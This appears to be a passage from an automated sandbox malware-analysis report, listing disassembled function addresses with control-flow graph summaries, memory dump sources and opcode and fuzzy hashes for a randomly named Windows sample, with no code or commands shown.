                                        • Opcode ID: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
                                        • Instruction ID: 2d84c5bc1b79f4c8cf9387dcf4839af0fab892cb1a736461c2943114052cb3a2
                                        • Opcode Fuzzy Hash: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
                                        • Instruction Fuzzy Hash: D811D621B1DE1D0BDFA8995C546927A77C1FB9832570102BAE84DD32E9DD19AC014380
                                        Function 00007FFD9BB0C746 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
                                        • Instruction ID: 72c41339f1ca5962bdc52df3006f1c3ce0283bc0097bcc3ab8c151859c991c0c
                                        • Opcode Fuzzy Hash: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
                                        • Instruction Fuzzy Hash: E121057160EBC95FD7598668D4202767BA0FF89254F4901FFE0C8CB2FBCB6999048342
                                        Function 00007FFD9BB06219 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 521 7ffd9bb06219-7ffd9bb06257 522 7ffd9bb06259 521->522 523 7ffd9bb0625e-7ffd9bb0627a 521->523 522->523 524 7ffd9bb06280-7ffd9bb0628d 523->524
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
                                        • Instruction ID: ec30bc578e43b78afa15ff034ad899b1d84318696788513aec17f9b7ad31dfe5
                                        • Opcode Fuzzy Hash: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
                                        • Instruction Fuzzy Hash: 32111B30918A4D8FCF85EF68C859AE97BF0FF28305F0145AAE859D72A1DB35A554CB80
                                        Function 00007FFD9BB06139 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 517 7ffd9bb06139-7ffd9bb06177 518 7ffd9bb06179 517->518 519 7ffd9bb0617e-7ffd9bb0619a 517->519 518->519 520 7ffd9bb061a0-7ffd9bb061ad 519->520
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
                                        • Instruction ID: cb3c79f513014a11bbf3273eab30b52dca90e989e80685e453905a562d1a8d34
                                        • Opcode Fuzzy Hash: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
                                        • Instruction Fuzzy Hash: 70115B30918A8D8FCF85EF68C859AE97BF0FF28304F0141AAE459D72A1DB34E554CB80
                                        Function 00007FFD9BAB4DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        • Opcode ID: f677e8ee3694212cf5bf51c723b2fdb56e9bc2a644fba88ea8e37825d4c5dcb1
                                        • Instruction ID: 3b1e770a5da7ce08a5d824a0b08c3a2344bf440d0571c7869f5738e8876489d0
                                        • Opcode Fuzzy Hash: f677e8ee3694212cf5bf51c723b2fdb56e9bc2a644fba88ea8e37825d4c5dcb1
                                        • Instruction Fuzzy Hash: 40112830E0596D8FEB74DB18CC546E9B7B1EF94316F1082E6D41DE22A5DE782E858F40
                                        Function 00007FFD9BB06CE9 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 544 7ffd9bb06ce9-7ffd9bb06d1f 545 7ffd9bb06d26-7ffd9bb06d3e 544->545 546 7ffd9bb06d21 544->546 547 7ffd9bb06d44-7ffd9bb06d51 545->547 546->545
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
                                        • Instruction ID: 9cf3427986f1fd3ba98fa97df2bc6cb1292ba1059c076b9117cf215d50f90b08
                                        • Opcode Fuzzy Hash: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
                                        • Instruction Fuzzy Hash: 6D012130918A8D8FCF85EF68C858AEA7BF0FF25304F4545AAD419D72A6D734D554CB80
                                        Function 00007FFD9BB04DF9 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 560 7ffd9bb04df9-7ffd9bb04e3b 563 7ffd9bb04e42-7ffd9bb04e43 call 7ffd9bb03ca8 560->563 564 7ffd9bb04e3d 560->564 566 7ffd9bb04e48-7ffd9bb04e55 563->566 564->563
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
                                        • Instruction ID: 9a345e4d1c1547a241727165fbcb8985f970d7575c2b10897d51f2680a6e73ac
                                        • Opcode Fuzzy Hash: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
                                        • Instruction Fuzzy Hash: 7BF0AF6091E7899FE765AB6048696F87FB0FF19304F4945FBE448C60E7DA2852448712
                                        Function 00007FFD9BB1CE40 Relevance: .3, Instructions: 298COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b8a8db05bf057011b6330e002f39e28984767d11fa30996afad6701548d929a
                                        • Instruction ID: 1878e06c853ea08a9530ca5138969472ad2d487610164a564028bfa99460a8e7
                                        • Opcode Fuzzy Hash: 9b8a8db05bf057011b6330e002f39e28984767d11fa30996afad6701548d929a
                                        • Instruction Fuzzy Hash: 56B10A71A19A5D8FDBA4DF58C8A5BE8B3B1FF58304F1151E9D40DE72A2DE346A80CB40
                                        Function 00007FFD9BB1CE0E Relevance: .3, Instructions: 256COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37b905311993666c125ea4360336c89b18a29c7ff2e783d6dbc8f5d37656182c
                                        • Instruction ID: 8354fefd8b132dcc5de4121794ba1f7f1a7a2270e42be34ee4de517239713322
                                        • Opcode Fuzzy Hash: 37b905311993666c125ea4360336c89b18a29c7ff2e783d6dbc8f5d37656182c
                                        • Instruction Fuzzy Hash: FC910C71A19A5D8FDBA4DF58C8A5BE8B3A1FB58305F4152E9D00DE3292DE346A80CF41
                                        Function 00007FFD9BB1CF09 Relevance: .3, Instructions: 255COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5848077ee8a4cdc234f2ae5c062d9cdf8003fb805096573c2a0530f9eaaaf4cd
                                        • Instruction ID: 8fe14f8d4a054ba4960fa1a2a5f3dc8db81cc8814e8903dd7c9c96714de28a7f
                                        • Opcode Fuzzy Hash: 5848077ee8a4cdc234f2ae5c062d9cdf8003fb805096573c2a0530f9eaaaf4cd
                                        • Instruction Fuzzy Hash: 41A1EB71A1995D8FDBA4DF58C8A5BA8B3B1FB58304F5151E9D00DE32A2DE346E80CF41
                                        Function 00007FFD9BAEFC79 Relevance: .2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 245c81544e4a754843115ac8557f44cbe4fedb36fad7ed8b0478e6fbc34c7d6d
                                        • Instruction ID: 298c98da131227bde207e5827198ff8b753f8c09ee247016cd272666a9a48c55
                                        • Opcode Fuzzy Hash: 245c81544e4a754843115ac8557f44cbe4fedb36fad7ed8b0478e6fbc34c7d6d
                                        • Instruction Fuzzy Hash: 0F910A75E0991D8FDBA8EF58C8A4BA977B2FF58300F4041AAD01DD72A5DA34AD85CF40
                                        Function 00007FFD9BAFBD6D Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 331a056d0e90993132fb8457c1a786ed0d43d023dc98fcc6ea8b1146f8289746
                                        • Instruction ID: 4b4ff4cb161a59c12f5e5efa8a06d2c69c2e1d8c3baa63c7d0d60e05d5fc0864
                                        • Opcode Fuzzy Hash: 331a056d0e90993132fb8457c1a786ed0d43d023dc98fcc6ea8b1146f8289746
                                        • Instruction Fuzzy Hash: 7B519D30F0DA4D8FEB64DB58C8A46E8BFB1EF49310F4541BAD049932A1CAB46A84CB41
                                        Function 00007FFD9BAC9079 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
                                        • Instruction ID: 41da8376c9f57bf9ccad964f653a8c3e9b7d2ad0ca53639703eeac63fe96854d
                                        • Opcode Fuzzy Hash: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
                                        • Instruction Fuzzy Hash: 70519030A0964D9FCF84EF58D898AED7BF1FF59311B0601A6E409E7261D674E990CB90
                                        Function 00007FFD9BB0D80E Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f5946d6eab2a10f283a352e125702884c5bf14a6bb0c17418ac3dff2132c418
                                        • Instruction ID: c584fee2cdb534da0d300fb5c48b19b51445230ff8248a0b6c06535bbf065def
                                        • Opcode Fuzzy Hash: 9f5946d6eab2a10f283a352e125702884c5bf14a6bb0c17418ac3dff2132c418
                                        • Instruction Fuzzy Hash: 67313E71E1DA5D4FEF98DA8C88A97B8B7E1FB68354F040169D54DE72E6DE346880CB00
                                        Function 00007FFD9BACFE50 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 517099bd5c00a431d80254afabef727b91e71514ac2e19d181047e71be19d984
                                        • Instruction ID: 75d00d98a2c563f9ac3c7a5e6cb0018f20cdd8264b25fbb2f2687eded838a5b0
                                        • Opcode Fuzzy Hash: 517099bd5c00a431d80254afabef727b91e71514ac2e19d181047e71be19d984
                                        • Instruction Fuzzy Hash: 6731266244E3C94FD7138B749CB16E17FB0AF13214F0A86DBD4C48B5E3D2685A1AC762
                                        Function 00007FFD9BB0BB84 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f56df8d7307223effa3bb59275a4997c7a8373c4b8f63214ab33a5f2aa01abc
                                        • Instruction ID: a8b1de6ab47555f65c2b4bd12780aa230dfe5283be980dfa6cb890a1cfb21892
                                        • Opcode Fuzzy Hash: 5f56df8d7307223effa3bb59275a4997c7a8373c4b8f63214ab33a5f2aa01abc
                                        • Instruction Fuzzy Hash: CC310A71E0A61D8FEBB8DB5488A57B877A1FB58305F1141BAC04ED22A5DF386A81CB00
                                        Function 00007FFD9BAC8D09 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f64a35c752763dcc9d7f2a02f8fcb45b1cf638a03f32dc104ad82360bc502e2
                                        • Instruction ID: dc43921295ddbc39b4f82e12f597bd756c1e61b46e6b13189c1430741dc628a7
                                        • Opcode Fuzzy Hash: 9f64a35c752763dcc9d7f2a02f8fcb45b1cf638a03f32dc104ad82360bc502e2
                                        • Instruction Fuzzy Hash: 81318D30A0964D8FCB55DF58C454AFE7BB1FF58314F02026AE849E3290CB34E940CB80
                                        Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4600d65ef11e2fbfce4e378f0c1f64cb0f81ef90b2e96b7a2e6335a39022c2b
                                        • Instruction ID: adf38bb036f1cc51eeeaca99dac1c8334db2bbde0c6bc422e5cae47a2905dd00
                                        • Opcode Fuzzy Hash: f4600d65ef11e2fbfce4e378f0c1f64cb0f81ef90b2e96b7a2e6335a39022c2b
                                        • Instruction Fuzzy Hash: 26210635B0E2AE4FE332ABA9CC212ED7B60EF42310F0645B3C1649B1E2D77816058B95
                                        Function 00007FFD9BAB5F11 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90d9575a2b453c61bbabb4252c34b474a75acb1a5a12da46aacdd7839b5995ce
                                        • Instruction ID: 8173d0b59fac6d7c9e170c4d2a7cfb0fd65da8ed33192c42b07ead3a6af080ac
                                        • Opcode Fuzzy Hash: 90d9575a2b453c61bbabb4252c34b474a75acb1a5a12da46aacdd7839b5995ce
                                        • Instruction Fuzzy Hash: ED319370E0D62D8EEBB9DB55C8687E8B7B1FB55301F4141E9D01DA22A1DBB86AC4CF01
                                        Function 00007FFD9BACD279 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0b3919ed32c2c1ef26e80d545eaf6ebd7d2d031365f3c2b2197a08c5f36a245
                                        • Instruction ID: e2a58bb284dbc8360e1217b34aaf60af7990985a77dfdef603068585b1a119cd
                                        • Opcode Fuzzy Hash: f0b3919ed32c2c1ef26e80d545eaf6ebd7d2d031365f3c2b2197a08c5f36a245
                                        • Instruction Fuzzy Hash: 63216271E0A50D8BEBA8EB48C8A1AB873B1FF54314F1041F9D11DD72A6CE35AD81CB40
                                        Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2afb888862aa3c5d23c73d0f16a692354d20401ab72d639681f5c52cde6e547d
                                        • Instruction ID: 6704e071f0789f29deda4c12d2919e5cc5804ea2b7609e89cf7044c2fc5883f5
                                        • Opcode Fuzzy Hash: 2afb888862aa3c5d23c73d0f16a692354d20401ab72d639681f5c52cde6e547d
                                        • Instruction Fuzzy Hash: E611E631B0E6AD4FE722ABA4C8212E97B70EF42310F0545B3D154DB1E3DA7816058B95
                                        Function 00007FFD9BB07580 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 828b9f9d6c3073bd28e9b69a4de13d95d948c46cdc5ca3694590d09b722fa92c
                                        • Instruction ID: 29ac5af66275e774c7069f9006c1c49190e482b93eb21641388212877b2ac24c
                                        • Opcode Fuzzy Hash: 828b9f9d6c3073bd28e9b69a4de13d95d948c46cdc5ca3694590d09b722fa92c
                                        • Instruction Fuzzy Hash: 3C216F71E1A90D8EEBA4DB99C8947BCB3E1FF58304F1482B5C44DA31A5DA3469818F50
                                        Function 00007FFD9BB0A9A1 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e489a9e80d924d910b53b955018f584a4b9b36563a908ba31e0e0daf9e4f6b55
                                        • Instruction ID: 406f09a0a758e46f738c6cfe4561db0d5db82c51418a71aabbedc79aeb6d2ac0
                                        • Opcode Fuzzy Hash: e489a9e80d924d910b53b955018f584a4b9b36563a908ba31e0e0daf9e4f6b55
                                        • Instruction Fuzzy Hash: 7E211831E0911D8FEB64DB98C998BEC77F1FF18304F114576D049E22D5DA38AA85DB40
                                        Function 00007FFD9BAB5D16 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84cf3d99fd2084313b6b807910f02623ad2f49de7cbef0bfb3e1db16cacbf1ad
                                        • Instruction ID: eadb2ce2c04f9b318e0cfc27543dbd33df3ad60f40c363f20002085847b76467
                                        • Opcode Fuzzy Hash: 84cf3d99fd2084313b6b807910f02623ad2f49de7cbef0bfb3e1db16cacbf1ad
                                        • Instruction Fuzzy Hash: 9B21C670E0A62E8EEBB4DB55C8647E8B7B1FB15301F1141F9D41DA26A1DBB87B818F01
                                        Function 00007FFD9BAFD0D9 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1163f2923835ebde89cf65bdd54baa715d69be93efbd1e234dc0cf40f124b98b
                                        • Instruction ID: 5c57fe2209322472f20bbb6700fc30c7736d7d8c2e0a9924b472b0d7500d06ac
                                        • Opcode Fuzzy Hash: 1163f2923835ebde89cf65bdd54baa715d69be93efbd1e234dc0cf40f124b98b
                                        • Instruction Fuzzy Hash: 8D11E97091878D8FCB45EF68C855AE97BF0FF69305F0501ABE849D72A1D734A950CB81
                                        Function 00007FFD9BAB5D1B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction ID: e373fefb8118e1e4e032d9954f87116d46e1461a261373e44bf138f7d0cc0d65
                                        • Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction Fuzzy Hash: 8321A370E1A23D8EDBB5DB65C8687A8B6B1EB15301F4141FA941DA22A1DB786B80DF00
                                        Function 00007FFD9BB1D659 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a06102b77239baab3bbe767db714eb9ef9bdf16ee98c6c88d61d1857d38ff07b
                                        • Instruction ID: 352fc604916749067ff20cdd8279736be5c48802f08275a131107f7ccfd294a0
                                        • Opcode Fuzzy Hash: a06102b77239baab3bbe767db714eb9ef9bdf16ee98c6c88d61d1857d38ff07b
                                        • Instruction Fuzzy Hash: 47111F70918A4D8FCF45EF58C8999E97BF0FF28305F0501AAD418D72A1D734E554CB81
                                        Function 00007FFD9BAB0C40 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b71596ed89f5ec5c910fac593c6ac0e489e38687703bb57f2b383b756990036
                                        • Instruction ID: abe550e493584946438b6431de6a45422229730cac93d55787e35477ceeb6418
                                        • Opcode Fuzzy Hash: 8b71596ed89f5ec5c910fac593c6ac0e489e38687703bb57f2b383b756990036
                                        • Instruction Fuzzy Hash: 7B110631A0E29D8FE722ABA4C8202E97B70EF42310F0545B3D155DB1E3CB786604CB95
                                        Function 00007FFD9BB0BC90 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd7fe7ebb33ae6d2adc2852730c4bd5037650ea08eb44bece972f702a0a55114
                                        • Instruction ID: 1a6f0dd5a84acc797f1ec01edff8fbfb56bc35fde405610d53e752c3d1c9dcea
                                        • Opcode Fuzzy Hash: fd7fe7ebb33ae6d2adc2852730c4bd5037650ea08eb44bece972f702a0a55114
                                        • Instruction Fuzzy Hash: 1C21A730A0561D8FDBB4EB58C8A4BA8B7B1FB58304F1445A9C00DE72A5DF746A85CB40
